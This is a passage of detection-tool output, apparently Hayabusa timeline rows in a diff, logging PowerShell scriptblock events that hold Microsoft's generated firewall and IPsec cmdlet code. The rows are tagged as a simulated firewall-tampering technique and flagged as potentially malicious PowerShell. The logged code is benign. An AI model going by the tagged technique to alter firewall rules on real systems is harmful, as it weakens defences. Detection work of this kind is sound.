[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 